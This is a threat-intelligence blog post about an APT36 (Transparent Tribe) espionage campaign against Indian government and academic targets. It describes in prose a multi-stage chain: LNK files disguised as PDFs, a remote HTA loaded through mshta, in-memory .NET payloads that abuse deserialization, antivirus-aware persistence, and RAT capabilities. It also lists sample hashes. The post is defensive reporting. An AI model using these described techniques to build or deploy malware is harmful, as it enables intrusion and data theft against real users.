The PolySwarm Blog

Analyze suspicious files and URLs, at scale, millions of times per day. Get real-time threat intel from a crowdsourced network of security experts and antivirus companies competing to protect you.

Transparent Tribe Evolves Tradecraft With Multi-Stage LNK Malware

Jan 12, 2026 1:55:19 PM / by The Hivemind

TRANSPARENTTRIBE2026Verticals Targeted: Government, Academia
Regions Targeted: India
Related Families: None

Executive Summary

APT36, also known as Transparent Tribe, a Pakistan-aligned threat actor, has launched a targeted cyber espionage campaign against Indian governmental, academic, and strategic entities using sophisticated deception techniques. The operation delivers a multi-stage Remote Access Trojan (RAT) through a weaponized LNK file disguised as a PDF, enabling persistent access, surveillance, and data exfiltration with minimal detection risk. The campaign has targeted government, academic, and strategic entities in India. 

Key Takeaways

  • Transparent Tribe employed deceptive delivery via oversized LNK files embedding full PDF content to mimic legitimate documents and evade suspicion.  
  • They leveraged fileless execution, using mshta.exe to retrieve and run remote HTA loader with layered decryption and in-memory payload reconstruction.  
  • The malware was equipped with adaptive persistence mechanisms to detect installed antivirus products and adjust techniques accordingly for long-term access.  
  • Comprehensive RAT capabilities include encrypted C2 communications, remote command execution, screenshot capture, clipboard manipulation, and targeted data theft.

The Activity

Researchers have observed a refined espionage operation from APT36 (Transparent Tribe), employing spear-phishing emails with ZIP archives containing malicious LNK files masquerading as examination-related PDF documents. Researchers at Cyfirma, who originally reported on this activity, did not designate a name for the malware used by Transparent Tribe in this campaign. For tracking and reporting purposes, PolySwarm analysts are referring to the malware associated with this campaign as ReadWriteRAT.

The LNK file used in the campaign, notably oversized due to embedded PDF structures and images, executes the legitimate Windows utility mshta.exe to fetch a remote HTA script from attacker-controlled infrastructure. This HTA loader conceals its window, implements custom Base64 decoding and XOR decryption, and manipulates the environment by setting .NET runtime variables via registry queries. The infection progresses through staged in-memory payloads. The initial "ReadOnly" component deserializes a .NET object using XAML-based configuration, abusing ObjectDataProvider to disable deserialization safeguards by altering internal .NET settings. This prepares the environment for the subsequent "WriteOnly" payload, a larger DLL loaded entirely in memory without disk artifacts.

The core malicious DLL establishes encrypted C2 channels over TCP to a hardcoded IP address, using AES encryption with a static key for data transmission. It profiles the system extensively, collecting details on operating system, username, installed software, and antivirus products via WMI queries. Persistence is dynamically tailored: for detected antivirus solutions, it deploys obfuscated HTA files or batch scripts in the Startup folder, invoked through PowerShell or cmd.exe; in other cases, it uses simplified shortcut placement or registry modifications.

The RAT provides extensive remote control features. It supports arbitrary shell command execution, file operations including enumeration, upload, download, and deletion, process listing and termination, and screenshot capture with resizing and JPEG compression for exfiltration. Surveillance extends to clipboard monitoring and manipulation, potentially enabling credential theft or cryptocurrency hijacking. Data theft routines recursively scan for sensitive files such as Office documents, PDFs, and databases, encoding and encrypting them prior to transmission.

To maintain deception, the malware deploys a decoy legitimate PDF upon execution, displaying it to the victim while background operations proceed. Additional threads monitor USB events for potential lateral movement. Overall, this campaign demonstrates APT36's advanced tradecraft in living-off-the-land techniques, environmental awareness, and modular design to sustain covert intelligence collection with reduced forensic footprints.

Who is Transparent Tribe?

Transparent Tribe, also known as APT36, ProjectM, Mythic Leopard, and COPPER FIELDSTONE, is a Pakistan-based APT group. The group has been active since at least 2013. Transparent Tribe primarily conducts cyber espionage operations. 

The group uses spear-phishing emails with malicious attachments such as Office documents, PDFs, ZIP archives, or LNK files to deliver remote access trojans (RATs). They employ custom and modified malware including Crimson RAT, CapraRAT, ElizaRAT, DeskRAT, and Limepad to establish persistence, capture screenshots, log keystrokes, exfiltrate files, and execute remote commands. They leverage social engineering by exploiting geopolitical events, such as border tensions or terror attacks, to craft convincing lures. The threat actor impersonates legitimate Indian government portals through malvertising, domain squatting, and fake websites to harvest credentials and deploy payloads. They also target mobile devices with Android implants for call, message, and location monitoring.

Transparent Tribe is known to target Indian government organizations, military personnel, defense contractors, aerospace sectors, research centers, diplomats, and educational institutions. The group has a primary focus on India, with secondary targeting of Afghanistan and opportunistic attacks on entities in other countries including Sri Lanka, Nepal, the United States, the United Kingdom, and various European and Asian nations.

Transparent Tribe is widely attributed to Pakistani state interests, with assessments linking its operations to Pakistan's military or intelligence services, particularly the Inter-Services Intelligence (ISI). The group's targeting aligns with Pakistan's geopolitical objectives, especially regarding India-Pakistan relations, Kashmir, and regional strategic intelligence.

IOCs

PolySwarm has multiple samples associated with this activity.

 

06fb22c743fcc949998e280bd5deaf8f80d616b371576b5e11fd5b1d3b23a5f2

c1f3dea00caec58c9e0f990366ff40ae59e93f666f92e1c218c03478bf3abe17

fc43f4c618bce57461df5752a8d3bedf243eacfdd3e648ea8b1310083764fd92


Click here to view all related samples in our PolySwarm portal.

 

Don’t have a PolySwarm account? Go here to sign up for a free Community plan or subscribe.

Contact us at hivemind@polyswarm.io | Check out our blog | Subscribe to our reports.

 

Topics: Threat Bulletin, APT36, Spear Phishing, Remote Access Trojan, cyber espionage, LNK Malware

The Hivemind

Written by The Hivemind

Subscribe to Email Updates

Lists by Topic

see all

Posts by Topic

See all

Recent Posts

Join the Marketplace

For Enterprises and Businesses

Learn More

For Security Experts and AV Companies

Learn More